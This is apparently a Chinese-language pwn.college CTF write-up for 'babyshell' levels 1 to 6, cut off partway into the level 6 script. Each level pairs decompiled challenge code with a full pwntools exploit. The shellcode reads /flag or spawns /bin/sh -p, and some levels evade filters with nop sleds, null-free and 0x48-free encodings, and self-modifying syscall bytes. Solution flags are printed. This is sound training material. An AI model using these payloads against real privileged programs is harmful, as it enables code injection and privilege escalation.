Level 1#

Information#

Category: Pwn

Description#

Write and execute shellcode to read the flag!

Write-up#

pwndbg> checksec
File:     /home/cub3y0nd/Projects/pwn.college/babyshell-level-1
Arch:     amd64
RELRO:      Full RELRO
Stack:      Canary found
NX:         NX unknown - GNU_STACK missing
PIE:        PIE enabled
Stack:      Executable
RWX:        Has RWX segments
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No


39 collapsed lines
1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  size_t v3; // rax
4
  size_t v4; // rax
5
  int fd; // [rsp+2Ch] [rbp-1024h]
6
  const char **i; // [rsp+30h] [rbp-1020h]
7
  const char **j; // [rsp+38h] [rbp-1018h]
8
  _BYTE v10[16]; // [rsp+40h] [rbp-1010h] BYREF
9
  unsigned __int64 v11; // [rsp+1048h] [rbp-8h]
10

11
  v11 = __readfsqword(0x28u);
12
  setvbuf(stdin, 0LL, 2, 0LL);
13
  setvbuf(_bss_start, 0LL, 2, 0LL);
14
  puts("###");
15
  printf("### Welcome to %s!\n", *argv);
16
  puts("###");
17
  putchar(10);
18
  puts(
19
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
20
  puts(
21
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
22
  puts(
23
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
24
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
25
  for ( fd = 3; fd <= 9999; ++fd )
26
    close(fd);
27
  for ( i = argv; *i; ++i )
28
  {
29
    v3 = strlen(*i);
30
    memset((void *)*i, 0, v3);
31
  }
32
  for ( j = envp; *j; ++j )
33
  {
34
    v4 = strlen(*j);
35
    memset((void *)*j, 0, v4);
36
  }
37
  puts(
38
    "In this challenge, shellcode will be copied onto the stack and executed. Since the stack location is randomized on every");
39
  puts("execution, your shellcode will need to be *position-independent*.\n");
40
  shellcode = v10;
41
  printf("Allocated 0x1000 bytes for shellcode on the stack at %p!\n", v10);
42
  puts("Reading 0x1000 bytes from stdin.\n");
43
  shellcode_size = read(0, shellcode, 0x1000uLL);
44
  if ( !shellcode_size )
45
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-1.c", 0x69u, "main");
46
  puts("This challenge is about to execute the following shellcode:\n");
47
  print_disassembly(shellcode, shellcode_size);
48
  puts(&byte_2565);
49
  puts("Executing shellcode!\n");
50
  ((void (*)(void))shellcode)();
51
  puts("### Goodbye!");
52
  return 0;
53
}

够简单的吧，stack rwx，((void (*)(void))shellcode)(); 把 buf 的地址强制转换为函数指针，执行我们的输入内容。

Exploit#

由于是 SUID 程序，以程序所有者权限运行。所以我们的思路是通过 sendfile(0x1, open("/flag", 0x0, 0x0), 0x0, 0x1000) 直接输出 /flag 的内容：

1
#!/usr/bin/python3
2

3
from pwn import ELF, asm, context, gdb, log, pause, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyshell-level-1"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14

15
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
16
    if local:
17
        elf = ELF(FILE)
18
        context.binary = elf
19

20
        if debug:
21
            return gdb.debug(
22
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
23
            )
24
        else:
25
            return process([elf.path] + (argv or []), env=envp)
26
    else:
27
        return remote(HOST, PORT)
28

29

30
def send_payload(target, payload):
31
    try:
32
        target.send(payload)
33
    except Exception as e:
34
        log.exception(f"An error occurred while sending payload: {e}")
35

36

37
def construct_payload():
38
    shellcode = asm(
39
        """
40
    mov rax, 0x67616c662f
41
    push rax
42
    lea rdi, [rsp]
43
    mov rsi, 0x0
44
    mov rdx, 0x0
45
    mov rax, 0x2
46
    syscall
47

48
    mov rdi, 0x1
49
    mov rsi, rax
50
    mov rdx, 0x0
51
    mov rcx, 0x1000
52
    mov rax, 0x28
53
    syscall
54

55
    mov rdi, 0x0
56
    mov rax, 0x3c
57
    syscall
58
        """
59
    )
60

61
    return shellcode
62

63

64
def attack(target, payload):
65
    try:
66
        send_payload(target, payload)
67

68
        response = target.recvall(timeout=5)
69

70
        return b"pwn.college{" in response
71
    except Exception as e:
72
        log.exception(f"An error occurred while performing attack: {e}")
73

74

75
def main():
76
    try:
77
        target = launch()
78
        payload = construct_payload()
79

80
        if attack(target, payload):
81
            log.success("Success! Exiting...")
82

83
            pause()
84
            exit()
85
    except Exception as e:
86
        log.exception(f"An error occurred in main: {e}")
87

88

89
if __name__ == "__main__":
90
    main()

还可以用 pwntools 的 shellcraft 来完成：

1
def construct_payload():
2
    shellcode = shellcraft.cat("/flag")
3

4
    return asm(shellcode)

如果要 shell 的话可以这样写，-p 参数确保使用真实 uid、gid 启动 /bin/sh：

1
def construct_payload():
2
    shellcode = shellcraft.execve("/bin/sh", ["/bin/sh", "-p"], 0)
3

4
    return asm(shellcode)

Flag#

Flag: pwn.college{s4taPKpK1SzfB3gWK--PDuB4Xwx.01NxIDL5cTNxgzW}

Level 2#

Information#

Category: Pwn

Description#

Write and execute shellcode to read the flag, but a portion of your input is randomly skipped.

Write-up#


41 collapsed lines
1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  size_t v3; // rax
4
  size_t v4; // rax
5
  unsigned int v5; // eax
6
  int fd; // [rsp+28h] [rbp-1028h]
7
  int v9; // [rsp+2Ch] [rbp-1024h]
8
  const char **i; // [rsp+30h] [rbp-1020h]
9
  const char **j; // [rsp+38h] [rbp-1018h]
10
  _BYTE v12[16]; // [rsp+40h] [rbp-1010h] BYREF
11
  unsigned __int64 v13; // [rsp+1048h] [rbp-8h]
12

13
  v13 = __readfsqword(0x28u);
14
  setvbuf(stdin, 0LL, 2, 0LL);
15
  setvbuf(_bss_start, 0LL, 2, 0LL);
16
  puts("###");
17
  printf("### Welcome to %s!\n", *argv);
18
  puts("###");
19
  putchar(10);
20
  puts(
21
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
22
  puts(
23
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
24
  puts(
25
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
26
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
27
  for ( fd = 3; fd <= 9999; ++fd )
28
    close(fd);
29
  for ( i = argv; *i; ++i )
30
  {
31
    v3 = strlen(*i);
32
    memset((void *)*i, 0, v3);
33
  }
34
  for ( j = envp; *j; ++j )
35
  {
36
    v4 = strlen(*j);
37
    memset((void *)*j, 0, v4);
38
  }
39
  puts(
40
    "In this challenge, shellcode will be copied onto the stack and executed. Since the stack location is randomized on every");
41
  puts("execution, your shellcode will need to be *position-independent*.\n");
42
  shellcode = v12;
43
  printf("Allocated 0x1000 bytes for shellcode on the stack at %p!\n", v12);
44
  puts("Reading 0x1000 bytes from stdin.\n");
45
  shellcode_size = read(0, shellcode, 0x1000uLL);
46
  if ( !shellcode_size )
47
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-2.c", 0x69u, "main");
48
  puts("Executing filter...\n");
4 collapsed lines
49
  puts(
50
    "This challenge will randomly skip up to 0x800 bytes in your shellcode. You better adapt to that! One way to evade this");
51
  puts(
52
    "is to have your shellcode start with a long set of single-byte instructions that do nothing, such as `nop`, before the");
53
  puts(
54
    "actual functionality of your code begins. When control flow hits any of these instructions, they will all harmlessly");
55
  puts("execute and then your real shellcode will run. This concept is called a `nop sled`.\n");
56
  v5 = time(0LL);
57
  srand(v5);
58
  v9 = rand() % 1792 + 256;
59
  shellcode = (char *)shellcode + v9;
60
  shellcode_size -= v9;
61
  puts("This challenge is about to execute the following shellcode:\n");
62
  print_disassembly(shellcode, shellcode_size);
63
  puts(&byte_2735);
64
  puts("Executing shellcode!\n");
65
  ((void (*)(void))shellcode)();
66
  puts("### Goodbye!");
67
  return 0;
68
}

这题在上一题的基础之上加了一个简单的限制：随机生成一个 [0, 2048) 之内的随机数，将 shellcode 地址设置为 buf 起始地址加上这个随机数。所以我们要避免把实际攻击代码放在 [0, 2048) 这个地址区间内，通过 nop sled 滑过这块区间就可以轻松绕过～

Exploit#

1
#!/usr/bin/python3
2

3
from pwn import ELF, asm, context, gdb, log, pause, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyshell-level-2"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14

15
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
16
    if local:
17
        elf = ELF(FILE)
18
        context.binary = elf
19

20
        if debug:
21
            return gdb.debug(
22
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
23
            )
24
        else:
25
            return process([elf.path] + (argv or []), env=envp)
26
    else:
27
        return remote(HOST, PORT)
28

29

30
def send_payload(target, payload):
31
    try:
32
        target.send(payload)
33
    except Exception as e:
34
        log.exception(f"An error occurred while sending payload: {e}")
35

36

37
def construct_payload():
38
    shellcode = asm(
39
        """
40
    .rept 0x7ff
41
        nop
42
    .endr
43

44
    mov rax, 0x67616c662f
45
    push rax
46
    lea rdi, [rsp]
47
    mov rsi, 0x0
48
    mov rdx, 0x0
49
    mov rax, 0x2
50
    syscall
51

52
    mov rdi, 0x1
53
    mov rsi, rax
54
    mov rdx, 0x0
55
    mov rcx, 0x1000
56
    mov rax, 0x28
57
    syscall
58

59
    mov rdi, 0x0
60
    mov rax, 0x3c
61
    syscall
62
        """
63
    )
64

65
    return shellcode
66

67

68
def attack(target, payload):
69
    try:
70
        send_payload(target, payload)
71

72
        response = target.recvall(timeout=5)
73

74
        return b"pwn.college{" in response
75
    except Exception as e:
76
        log.exception(f"An error occurred while performing attack: {e}")
77

78

79
def main():
80
    try:
81
        target = launch()
82
        payload = construct_payload()
83

84
        if attack(target, payload):
85
            log.success("Success! Exiting...")
86

87
            pause()
88
            exit()
89
    except Exception as e:
90
        log.exception(f"An error occurred in main: {e}")
91

92

93
if __name__ == "__main__":
94
    main()

1
def construct_payload(sled_length):
2
    shellcode = shellcraft.nop() * sled_length
3
    shellcode += shellcraft.cat("/flag")
4

5
    return asm(shellcode)

Flag#

Flag: pwn.college{ws9aMHkG9tAyi31HLrmkc2LoE35.0FOxIDL5cTNxgzW}

Level 3#

Information#

Category: Pwn

Description#

Write and execute shellcode to read the flag, but your inputted data is filtered before execution.

Write-up#


36 collapsed lines
1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  size_t v3; // rax
4
  size_t v4; // rax
5
  int fd; // [rsp+28h] [rbp-18h]
6
  int k; // [rsp+2Ch] [rbp-14h]
7
  const char **i; // [rsp+30h] [rbp-10h]
8
  const char **j; // [rsp+38h] [rbp-8h]
9

10
  setvbuf(stdin, 0LL, 2, 0LL);
11
  setvbuf(_bss_start, 0LL, 2, 0LL);
12
  puts("###");
13
  printf("### Welcome to %s!\n", *argv);
14
  puts("###");
15
  putchar(10);
16
  puts(
17
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
18
  puts(
19
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
20
  puts(
21
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
22
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
23
  for ( fd = 3; fd <= 9999; ++fd )
24
    close(fd);
25
  for ( i = argv; *i; ++i )
26
  {
27
    v3 = strlen(*i);
28
    memset((void *)*i, 0, v3);
29
  }
30
  for ( j = envp; *j; ++j )
31
  {
32
    v4 = strlen(*j);
33
    memset((void *)*j, 0, v4);
34
  }
35
  shellcode = mmap((void *)0x2CE31000, 0x1000uLL, 7, 34, 0, 0LL);
36
  if ( shellcode != (void *)753078272 )
37
    __assert_fail("shellcode == (void *)0x2ce31000", "/challenge/babyshell-level-3.c", 0x62u, "main");
38
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x2CE31000);
39
  puts("Reading 0x1000 bytes from stdin.\n");
40
  shellcode_size = read(0, shellcode, 0x1000uLL);
41
  if ( !shellcode_size )
42
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-3.c", 0x67u, "main");
43
  puts("Executing filter...\n");
44
  puts("This challenge requires that your shellcode have no NULL bytes!\n");
45
  for ( k = 0; k < (unsigned __int64)shellcode_size; ++k )
46
  {
47
    if ( !*((_BYTE *)shellcode + k) )
48
    {
49
      printf("Failed filter at byte %d!\n", k);
50
      exit(1);
51
    }
52
  }
53
  puts("This challenge is about to execute the following shellcode:\n");
54
  print_disassembly(shellcode, shellcode_size);
55
  puts(&byte_251D);
56
  puts("Executing shellcode!\n");
57
  ((void (*)(void))shellcode)();
58
  puts("### Goodbye!");
59
  return 0;
60
}

这次的限制是 shellcode 的机器指令中不允许出现 \x00 字节。这就需要我们好好利用各种指令组合来构造数据了。

Exploit#

1
#!/usr/bin/python3
2

3
from pwn import ELF, asm, context, gdb, log, pause, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyshell-level-3"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14

15
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
16
    if local:
17
        elf = ELF(FILE)
18
        context.binary = elf
19

20
        if debug:
21
            return gdb.debug(
22
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
23
            )
24
        else:
25
            return process([elf.path] + (argv or []), env=envp)
26
    else:
27
        return remote(HOST, PORT)
28

29

30
def send_payload(target, payload):
31
    try:
32
        target.send(payload)
33
    except Exception as e:
34
        log.exception(f"An error occurred while sending payload: {e}")
35

36

37
def construct_payload():
38
    shellcode = asm(
39
        """
40
    mov rdi, 0x67616c66
41
    shl rdi, 0x8
42
    or rdi, 0x2f
43
    push rdi
44
    lea rdi, [rsp]
45
    xor rsi, rsi
46
    xor rdx, rdx
47
    xor rax, rax
48
    or rax, 0x2
49
    syscall
50

51
    xor rdi, rdi
52
    or rdi, 0x1
53
    mov rsi, rax
54
    xor rdx, rdx
55
    xor r10, r10
56
    or r10, 0xfffffff
57
    xor rax, rax
58
    or rax, 0x28
59
    syscall
60

61
    dec rdi
62
    xor rax, rax
63
    or rax, 0x3c
64
    syscall
65
        """
66
    )
67

68
    return shellcode
69

70

71
def attack(target, payload):
72
    try:
73
        send_payload(target, payload)
74

75
        response = target.recvall(timeout=5)
76

77
        return b"pwn.college{" in response
78
    except Exception as e:
79
        log.exception(f"An error occurred while performing attack: {e}")
80

81

82
def main():
83
    try:
84
        target = launch()
85
        payload = construct_payload()
86

87
        if attack(target, payload):
88
            log.success("Success! Exiting...")
89

90
            pause()
91
            exit()
92
    except Exception as e:
93
        log.exception(f"An error occurred in main: {e}")
94

95

96
if __name__ == "__main__":
97
    main()

pwntools 自动生成的代码已经避免了 \x00，非常方便～

1
def construct_payload():
2
    shellcode = shellcraft.cat("/flag")
3

4
    return asm(shellcode)

Flag#

Flag: pwn.college{gZQWA0hDKCz5Xn8KrcsIiwIX2aZ.0VOxIDL5cTNxgzW}

Level 4#

Information#

Category: Pwn

Description#

Write and execute shellcode to read the flag, but your inputted data is filtered before execution.

Write-up#


36 collapsed lines
1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  size_t v3; // rax
4
  size_t v4; // rax
5
  int fd; // [rsp+28h] [rbp-18h]
6
  int k; // [rsp+2Ch] [rbp-14h]
7
  const char **i; // [rsp+30h] [rbp-10h]
8
  const char **j; // [rsp+38h] [rbp-8h]
9

10
  setvbuf(stdin, 0LL, 2, 0LL);
11
  setvbuf(_bss_start, 0LL, 2, 0LL);
12
  puts("###");
13
  printf("### Welcome to %s!\n", *argv);
14
  puts("###");
15
  putchar(10);
16
  puts(
17
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
18
  puts(
19
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
20
  puts(
21
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
22
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
23
  for ( fd = 3; fd <= 9999; ++fd )
24
    close(fd);
25
  for ( i = argv; *i; ++i )
26
  {
27
    v3 = strlen(*i);
28
    memset((void *)*i, 0, v3);
29
  }
30
  for ( j = envp; *j; ++j )
31
  {
32
    v4 = strlen(*j);
33
    memset((void *)*j, 0, v4);
34
  }
35
  shellcode = mmap((void *)0x2D632000, 0x1000uLL, 7, 34, 0, 0LL);
36
  if ( shellcode != (void *)761470976 )
37
    __assert_fail("shellcode == (void *)0x2d632000", "/challenge/babyshell-level-4.c", 0x62u, "main");
38
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x2D632000);
39
  puts("Reading 0x1000 bytes from stdin.\n");
40
  shellcode_size = read(0, shellcode, 0x1000uLL);
41
  if ( !shellcode_size )
42
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-4.c", 0x67u, "main");
43
  puts("Executing filter...\n");
44
  puts("This challenge requires that your shellcode have no H bytes!\n");
45
  for ( k = 0; k < (unsigned __int64)shellcode_size; ++k )
46
  {
47
    if ( *((_BYTE *)shellcode + k) == 0x48 )
48
    {
49
      printf("Failed filter at byte %d!\n", k);
50
      exit(1);
51
    }
52
  }
53
  puts("This challenge is about to execute the following shellcode:\n");
54
  print_disassembly(shellcode, shellcode_size);
55
  puts(&byte_251D);
56
  puts("Executing shellcode!\n");
57
  ((void (*)(void))shellcode)();
58
  puts("### Goodbye!");
59
  return 0;
60
}

显然，这次不允许我们使用 64-bit 汇编写 shellcode。Why？Cuz 64-bit 汇编指令本质上就是 32-bit 汇编的拓展，大多数指令都以前缀 0x48 开始。easy peasy!

push、pop 指令没有 0x48 前缀，可以正常使用。

Exploit#

1
#!/usr/bin/python3
2

3
from pwn import ELF, asm, context, gdb, log, pause, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyshell-level-4"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14

15
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
16
    if local:
17
        elf = ELF(FILE)
18
        context.binary = elf
19

20
        if debug:
21
            return gdb.debug(
22
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
23
            )
24
        else:
25
            return process([elf.path] + (argv or []), env=envp)
26
    else:
27
        return remote(HOST, PORT)
28

29

30
def send_payload(target, payload):
31
    try:
32
        target.send(payload)
33
    except Exception as e:
34
        log.exception(f"An error occurred while sending payload: {e}")
35

36

37
def construct_payload():
38
    shellcode = asm(
39
        """
40
    lea ebx, [eip+0x2c]
41
    xor ecx, esi
42
    xor edx, edx
43
    mov eax, 0x5
44
    int 0x80
45

46
    mov ebx, 0x1
47
    mov ecx, eax
48
    xor edx, edx
49
    mov esi, 0x1000
50
    mov eax, 0xbb
51
    int 0x80
52

53
    mov ebx, 0x0
54
    mov eax, 0x1
55
    int 0x80
56

57
flag:
58
    .string "/flag"
59
        """
60
    )
61

62
    return shellcode
63

64

65
def attack(target, payload):
66
    try:
67
        send_payload(target, payload)
68

69
        response = target.recvall(timeout=5)
70

71
        return b"pwn.college{" in response
72
    except Exception as e:
73
        log.exception(f"An error occurred while performing attack: {e}")
74

75

76
def main():
77
    try:
78
        target = launch()
79
        payload = construct_payload()
80

81
        if attack(target, payload):
82
            log.success("Success! Exiting...")
83

84
            pause()
85
            exit()
86
    except Exception as e:
87
        log.exception(f"An error occurred in main: {e}")
88

89

90
if __name__ == "__main__":
91
    main()

这里再提供一种写法：

1
.global _start
2
.intel_syntax noprefix
3

4
_start:
5
  push 0x2f
6
  mov dword ptr [rsp + 1], 0x67616c66
7
  push rsp
8
  pop rdi
9
  xor esi, esi
10
  xor edx, edx
11
  mov al, 0x2
12
  syscall
13

14
  mov edi, 0x1
15
  mov esi, eax
16
  xor edx, edx
17
  mov r10, 0x1000
18
  mov al, 0x28
19
  syscall
20

21
  xor edi, edi
22
  mov al, 0x3c
23
  syscall

由于这题只是不想让我们用 64-bit 的指令，所以我们不能简单的通过 pwntools 生成 32-bit 指令来解决。这样生成出来的指令无法执行，我估计是内存对齐问题导致？因为这个程序本生是 amd64 的。

Flag#

Flag: pwn.college{wqf2fgp7CVvoI3yhbzzsqtw5OC3.0FMyIDL5cTNxgzW}

Level 5#

Information#

Category: Pwn

Description#

Write and execute shellcode to read the flag, but the inputted data cannot contain any form of system call bytes (syscall, sysenter, int), can you defeat this?

Write-up#


37 collapsed lines
1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  size_t v3; // rax
4
  size_t v4; // rax
5
  int fd; // [rsp+20h] [rbp-20h]
6
  int k; // [rsp+24h] [rbp-1Ch]
7
  const char **i; // [rsp+28h] [rbp-18h]
8
  const char **j; // [rsp+30h] [rbp-10h]
9
  _WORD *v11; // [rsp+38h] [rbp-8h]
10

11
  setvbuf(stdin, 0LL, 2, 0LL);
12
  setvbuf(_bss_start, 0LL, 2, 0LL);
13
  puts("###");
14
  printf("### Welcome to %s!\n", *argv);
15
  puts("###");
16
  putchar(10);
17
  puts(
18
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
19
  puts(
20
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
21
  puts(
22
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
23
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
24
  for ( fd = 3; fd <= 9999; ++fd )
25
    close(fd);
26
  for ( i = argv; *i; ++i )
27
  {
28
    v3 = strlen(*i);
29
    memset((void *)*i, 0, v3);
30
  }
31
  for ( j = envp; *j; ++j )
32
  {
33
    v4 = strlen(*j);
34
    memset((void *)*j, 0, v4);
35
  }
36
  shellcode = mmap((void *)0x1A315000, 0x1000uLL, 7, 34, 0, 0LL);
37
  if ( shellcode != (void *)439439360 )
38
    __assert_fail("shellcode == (void *)0x1a315000", "/challenge/babyshell-level-5.c", 0x62u, "main");
39
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x1A315000);
40
  puts("Reading 0x1000 bytes from stdin.\n");
41
  shellcode_size = read(0, shellcode, 0x1000uLL);
42
  if ( !shellcode_size )
43
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-5.c", 0x67u, "main");
44
  puts("Executing filter...\n");
2 collapsed lines
45
  puts(
46
    "This challenge requires that your shellcode does not have any `syscall`, 'sysenter', or `int` instructions. System calls");
47
  puts("are too dangerous! This filter works by scanning through the shellcode for the following byte sequences: 0f05");
48
  puts("(`syscall`), 0f34 (`sysenter`), and 80cd (`int`). One way to evade this is to have your shellcode modify itself to");
49
  puts("insert the `syscall` instructions at runtime.\n");
50
  for ( k = 0; k < (unsigned __int64)shellcode_size; ++k )
51
  {
52
    v11 = (char *)shellcode + k;
53
    if ( *v11 == 0x80CD || *v11 == 0x340F || *v11 == 0x50F )
54
    {
55
      printf("Failed filter at byte %d!\n", k);
56
      exit(1);
57
    }
58
  }
59
  puts("This challenge is about to execute the following shellcode:\n");
60
  print_disassembly(shellcode, shellcode_size);
61
  puts(&byte_2675);
62
  puts("Executing shellcode!\n");
63
  ((void (*)(void))shellcode)();
64
  puts("### Goodbye!");
65
  return 0;
66
}

不让出现系统调用原语的机器码，绕过方法非常 ez 啊，请看 exp。

Exploit#

1
#!/usr/bin/python3
2

3
from pwn import ELF, asm, context, gdb, log, pause, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyshell-level-5"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14

15
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
16
    if local:
17
        elf = ELF(FILE)
18
        context.binary = elf
19

20
        if debug:
21
            return gdb.debug(
22
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
23
            )
24
        else:
25
            return process([elf.path] + (argv or []), env=envp)
26
    else:
27
        return remote(HOST, PORT)
28

29

30
def send_payload(target, payload):
31
    try:
32
        target.send(payload)
33
    except Exception as e:
34
        log.exception(f"An error occurred while sending payload: {e}")
35

36

37
def construct_payload():
38
    shellcode = """
39
    /* push b'/flag\x00' */
40
    mov rax, 0x101010101010101
41
    push rax
42
    mov rax, 0x101010101010101 ^ 0x67616c662f
43
    xor [rsp], rax
44
    /* call open('rsp', 'O_RDONLY', 'rdx') */
45
    push 2 /* 2 */
46
    pop rax
47
    mov rdi, rsp
48
    xor esi, esi /* O_RDONLY */
49
    inc byte ptr [rip + 1]
50
    .byte 0x0f, 0x04
51
    /* call sendfile(1, 'rax', 0, 0x7fffffff) */
52
    mov r10d, 0x7fffffff
53
    mov rsi, rax
54
    push 40 /* 0x28 */
55
    pop rax
56
    push 1
57
    pop rdi
58
    cdq /* rdx=0 */
59
    inc byte ptr [rip + 1]
60
    .byte 0x0f, 0x04
61
    """
62

63
    return asm(shellcode)
64

65

66
def attack(target, payload):
67
    try:
68
        send_payload(target, payload)
69

70
        response = target.recvall(timeout=5)
71

72
        return b"pwn.college{" in response
73
    except Exception as e:
74
        log.exception(f"An error occurred while performing attack: {e}")
75

76

77
def main():
78
    try:
79
        target = launch()
80
        payload = construct_payload()
81

82
        if attack(target, payload):
83
            log.success("Success! Exiting...")
84

85
            pause()
86
            exit()
87
    except Exception as e:
88
        log.exception(f"An error occurred in main: {e}")
89

90

91
if __name__ == "__main__":
92
    main()

Flag#

Flag: pwn.college{AJ-22D5IQdnex2KL8LxB8zOq02R.0VMyIDL5cTNxgzW}

Level 6#

Information#

Category: Pwn

Description#

Write and execute shellcode to read the flag, but the inputted data cannot contain any form of system call bytes (syscall, sysenter, int), this challenge adds an extra layer of difficulty!

Write-up#


37 collapsed lines
1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  size_t v3; // rax
4
  size_t v4; // rax
5
  int fd; // [rsp+20h] [rbp-20h]
6
  int k; // [rsp+24h] [rbp-1Ch]
7
  const char **i; // [rsp+28h] [rbp-18h]
8
  const char **j; // [rsp+30h] [rbp-10h]
9
  _WORD *v11; // [rsp+38h] [rbp-8h]
10

11
  setvbuf(stdin, 0LL, 2, 0LL);
12
  setvbuf(_bss_start, 0LL, 2, 0LL);
13
  puts("###");
14
  printf("### Welcome to %s!\n", *argv);
15
  puts("###");
16
  putchar(10);
17
  puts(
18
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
19
  puts(
20
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
21
  puts(
22
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
23
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
24
  for ( fd = 3; fd <= 9999; ++fd )
25
    close(fd);
26
  for ( i = argv; *i; ++i )
27
  {
28
    v3 = strlen(*i);
29
    memset((void *)*i, 0, v3);
30
  }
31
  for ( j = envp; *j; ++j )
32
  {
33
    v4 = strlen(*j);
34
    memset((void *)*j, 0, v4);
35
  }
36
  shellcode = mmap((void *)0x26E45000, 0x2000uLL, 7, 34, 0, 0LL);
37
  if ( shellcode != (void *)652496896 )
38
    __assert_fail("shellcode == (void *)0x26e45000", "/challenge/babyshell-level-6.c", 0x62u, "main");
39
  printf("Mapped 0x2000 bytes for shellcode at %p!\n", (const void *)0x26E45000);
40
  puts("Reading 0x2000 bytes from stdin.\n");
41
  shellcode_size = read(0, shellcode, 0x2000uLL);
42
  if ( !shellcode_size )
43
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-6.c", 0x67u, "main");
44
  puts("Executing filter...\n");
2 collapsed lines
45
  puts(
46
    "This challenge requires that your shellcode does not have any `syscall`, 'sysenter', or `int` instructions. System calls");
47
  puts("are too dangerous! This filter works by scanning through the shellcode for the following byte sequences: 0f05");
48
  puts("(`syscall`), 0f34 (`sysenter`), and 80cd (`int`). One way to evade this is to have your shellcode modify itself to");
49
  puts("insert the `syscall` instructions at runtime.\n");
50
  for ( k = 0; k < (unsigned __int64)shellcode_size; ++k )
51
  {
52
    v11 = (char *)shellcode + k;
53
    if ( *v11 == 0x80CD || *v11 == 0x340F || *v11 == 0x50F )
54
    {
55
      printf("Failed filter at byte %d!\n", k);
56
      exit(1);
57
    }
58
  }
59
  puts("Removing write permissions from first 4096 bytes of shellcode.\n");
60
  if ( mprotect(shellcode, 0x1000uLL, 5) )
61
    __assert_fail(
5 collapsed lines
62
      "mprotect(shellcode, 4096, PROT_READ|PROT_EXEC) == 0",
63
      "/challenge/babyshell-level-6.c",
64
      0x79u,
65
      "main");
66
  puts("This challenge is about to execute the following shellcode:\n");
67
  print_disassembly(shellcode, shellcode_size);
68
 puts(&byte_26ED);
69
  puts("Executing shellcode!\n");
70
  ((void (*)(void))shellcode)();
71
  puts("### Goodbye!");
72
  return 0;
73
}

还是没难度。首先不允许出现系统调用原语的机器码，其次会在执行 shellcode 前移除前 0x1000 字节区块的写权限。由于我们的 shellcode 会去修改自生的指令来绕过不允许出现系统调用原语的机器码，所以肯定不能把 shellcoded 写在前 0x1000 字节的区块中，因为程序读了 0x2000 字节，所以我们把核心代码写到前 0x1000 字节之后即可。至于这前 0x1000 字节，我们一个 nop 滑铲滑过去就好了。

Exploit#

1
#!/usr/bin/python3
2

3
from pwn import ELF, asm, context, gdb, log, pause, process, remote, shellcraft
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyshell-level-6"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14

15
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
16
    if local:
17
        elf = ELF(FILE)
18
        context.binary = elf
19

20
        if debug:
21
